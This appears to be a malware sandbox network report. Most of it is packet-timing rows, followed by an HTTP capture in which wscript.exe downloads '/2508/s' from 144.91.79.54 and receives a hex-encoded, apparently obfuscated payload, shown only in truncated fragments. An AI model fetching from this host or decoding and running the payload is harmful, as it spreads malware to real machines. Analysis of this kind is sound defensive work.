          Aug 29, 2024 18:36:59.941382885 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.942723036 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.942734957 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.942795038 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.944272995 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.944287062 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.944350004 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.945883989 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.945895910 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.945941925 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.947324038 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.947338104 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.947349072 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.947381020 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.948854923 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.948867083 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.948914051 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.950579882 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.950597048 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.950645924 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.952208996 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.952224970 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.952258110 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.953682899 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.953696966 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.953708887 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.953736067 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.953752995 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.955302000 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.955317020 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.955382109 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.956768990 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.956780910 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.956830025 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.958233118 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.958245039 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.958296061 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.959938049 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.959949970 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.959989071 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.962327003 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.962340117 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.962349892 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.962383032 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.964581966 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.964595079 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.964628935 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.967225075 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.967238903 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.967282057 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.968985081 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.968997002 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.969049931 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.970069885 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.970082998 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.970139027 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.971358061 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.971375942 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.971386909 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.971445084 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.972312927 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.972325087 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.972371101 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.973707914 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.973723888 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.973766088 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.974942923 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.974956036 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.974997044 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.976290941 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.976310015 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.976320028 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.976351976 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.977843046 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.977857113 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.977905989 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.979181051 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.979192972 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.979240894 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.980938911 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.980959892 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.981008053 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.986633062 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.986701965 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.986872911 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.986885071 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.986922979 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.987962008 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.987973928 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.988019943 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:36:59.989687920 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.989702940 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:36:59.989748001 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.001750946 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.002077103 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.002089024 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.002154112 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.003264904 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.003276110 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.003323078 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.004772902 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.004785061 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.004842043 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.006561995 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.006573915 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.006582975 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.006627083 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.008368015 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.008382082 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.008455038 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.010023117 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.010035038 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.010088921 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.012088060 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.012099981 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.012145042 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.013385057 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.013396978 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.013448954 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.015590906 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.015608072 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.015614033 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.015645981 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.016732931 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.016748905 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.016792059 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.019228935 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.019241095 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.019282103 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.021173954 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.021188021 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.021239996 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.023143053 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.023155928 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.023165941 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.023212910 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.025152922 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.025166035 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.025229931 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.027002096 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.027014017 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.027062893 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.029045105 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.029057980 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.029103994 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.030721903 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.030735970 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.030777931 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.033058882 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.033080101 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.033091068 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.033140898 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.034511089 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.034523964 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.034569979 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.036796093 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.036828041 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.036868095 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.038005114 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.038017988 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.038059950 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.040492058 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.040503979 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.040514946 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.040569067 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.041729927 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.041743040 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.041769028 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.041817904 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.044504881 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.044521093 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.044585943 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.045936108 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.045955896 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.046026945 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.048264980 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.048281908 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.048357964 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.048835993 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.048846960 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.048856974 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.048888922 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.051806927 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.051822901 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.051892996 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.052179098 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.052190065 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.052246094 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.055074930 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.055088997 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.055151939 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.055275917 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.055288076 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.055298090 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.055329084 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.055365086 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.058353901 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.058386087 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.058460951 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.058754921 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.058767080 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.058804989 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.061712027 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.061727047 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.061784983 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.062292099 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.062304974 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.062377930 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.064743042 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.064757109 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.064769030 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.064816952 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.065871954 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.065885067 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.065934896 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.068162918 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.068180084 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.068226099 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.069498062 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.069510937 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.069560051 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.071089983 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.071105003 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.071115017 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.071150064 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.071163893 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.072359085 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.072371960 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.072413921 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.073242903 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.073255062 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.073296070 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.074654102 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.074666023 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.074703932 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.075419903 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.075433016 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.075473070 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.076844931 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.076858044 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.076915026 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.078130960 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.078636885 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.078649044 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.078695059 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.079400063 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.079412937 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.079458952 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.081136942 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.081150055 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.081198931 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.092869997 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.092966080 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.093287945 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.093300104 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.093338013 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.094647884 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.094660997 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.094702005 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.096060991 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.096074104 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.096115112 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.097639084 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.097654104 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.097664118 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.097712040 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.098850965 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.098865032 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.098918915 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.101450920 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.101537943 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.322772980 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.328202963 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.520952940 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.548715115 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.553889990 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.744687080 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.744945049 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.744965076 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.745012045 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:00.745851040 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.745862961 CEST8049710144.91.79.54192.168.2.6
          Aug 29, 2024 18:37:00.745908976 CEST4971080192.168.2.6144.91.79.54
          Aug 29, 2024 18:37:01.309767008 CEST4971080192.168.2.6144.91.79.54

          HTTP Request Dependency Graph

          • 144.91.79.54

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649710144.91.79.54805716C:\Windows\System32\wscript.exe
          TimestampBytes transferredDirectionData
          Aug 29, 2024 18:36:57.835489035 CEST176OUTGET /2508/s HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Language: en-CH
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: 144.91.79.54
          Aug 29, 2024 18:36:58.558868885 CEST1236INHTTP/1.1 200 OK
          Date: Thu, 29 Aug 2024 16:36:58 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Wed, 28 Aug 2024 22:32:13 GMT
          ETag: "7000-620c5ee00454e"
          Accept-Ranges: bytes
          Content-Length: 28672
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Data Raw: 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 [TRUNCATED]
          Data Ascii: 4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
          Aug 29, 2024 18:36:58.559431076 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
          Data Ascii: 141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
          Aug 29, 2024 18:36:58.559469938 CEST1236INData Raw: 33 33 31 34 37 36 35 36 37 34 44 35 38 35 41 36 45 35 36 34 37 36 32 37 30 35 41 35 38 36 31 37 39 34 32 34 36 35 41 36 43 35 32 33 33 36 33 36 43 35 36 35 38 36 33 36 43 34 41 34 38 35 30 36 37 34 31 34 33 34 39 36 37 34 31 34 33 34 39 34 42 33
          Data Ascii: 3314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A
          Aug 29, 2024 18:36:58.561745882 CEST1236INData Raw: 31 34 31 34 31 35 31 34 31 34 31 36 46 34 31 34 31 34 31 34 31 34 31 34 31 34 31 36 43 34 32 34 31 36 35 34 31 35 35 34 37 34 31 37 35 34 31 37 37 35 41 34 31 36 33 34 37 34 31 36 44 34 32 36 37 35 41 34 31 36 33 34 37 34 31 36 45 34 32 34 31 34
          Data Ascii: 141415141416F414141414141416C424165415547417541775A416347416D42675A416347416E4241414155474174425159413447416C424162416B474147424162414547417542516141634741704267634138454142417743413444414141414141414141414177634173474179425159413047416C42415A
          Aug 29, 2024 18:36:58.561758041 CEST1236INData Raw: 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 33 34 34 37 34 31 37 36 34 32 35 31 36 31 34 31 35 31 34 38 34 31 36 38 34 32 34 31 36 32 34 31 34 44 34 38 34 31 37 35 34 32 35 31 35 39 34 31 34 39 34 38 34 31 35 35 34 32 34 31 34 31 34 31 35
          Data Ascii: 14141414141414141344741764251614151484168424162414D4841754251594149484155424141415141416B414141414141417642675A413447414A42515A41774741704267524149484168426756414541414141415241414141414141414141414141414141414141414241414141514141414141414141
          Aug 29, 2024 18:36:58.563810110 CEST1236INData Raw: 39 35 41 36 45 35 41 36 44 35 41 36 45 36 34 34 37 35 38 36 45 35 36 36 45 35 39 36 43 35 32 34 35 35 38 37 31 34 41 33 32 36 32 36 33 34 36 33 32 36 32 37 33 37 38 35 36 35 39 37 32 36 43 33 32 36 31 36 38 36 38 34 37 35 38 37 37 33 39 34 37 36
          Data Ascii: 95A6E5A6D5A6E6447586E566E596C524558714A32626346326273785659726C32616868475877394764724E585A45786C627031475A687831637956326356786C4F444241414145416F352B6F496C577535542B55636B4434506E38345354523055534241414141414141414141414141414141414141414241
